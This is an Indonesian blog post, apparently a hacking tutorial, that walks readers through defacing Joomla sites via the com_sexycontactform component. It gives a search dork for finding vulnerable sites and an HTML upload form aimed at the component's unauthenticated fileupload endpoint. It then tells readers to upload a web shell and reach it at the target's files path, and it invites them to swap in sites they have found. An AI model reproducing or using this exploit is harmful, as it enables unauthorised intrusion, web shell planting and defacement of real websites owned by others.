Lama Gak ketemu :3 , maklum lagi sibuk di dunia nyata , tapi alhamdullilah sekarang lagi libur kerja :D
ok , langsung saja , saya akan share tutorial deface Joomla dengan Com_sexycontactform
ok pertama :
dork : inurl:/com_sexycontactform/ ( dork bisa dikembangkan :v )
exploiter : <form method="POST" action="http://localhost/components/com_sexycontactform//fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form> ( simpan dengan format .html ) * http://localhost , ganti dengan target yang sudah kalian dapat
selanjutnya , upload shell kalian
nah , kalau sudah , nanti akan ada tulisan yang berbahasa planet :v , itu tandanya upload shell berhasil :D
akses shell : http://www.situs-target.com/component/com_sexycontactform/fileupload/files/shell.php
bagaimana ? mudah bukan :D
ok sekian dari saya ^_^
0 komentar:
Posting Komentar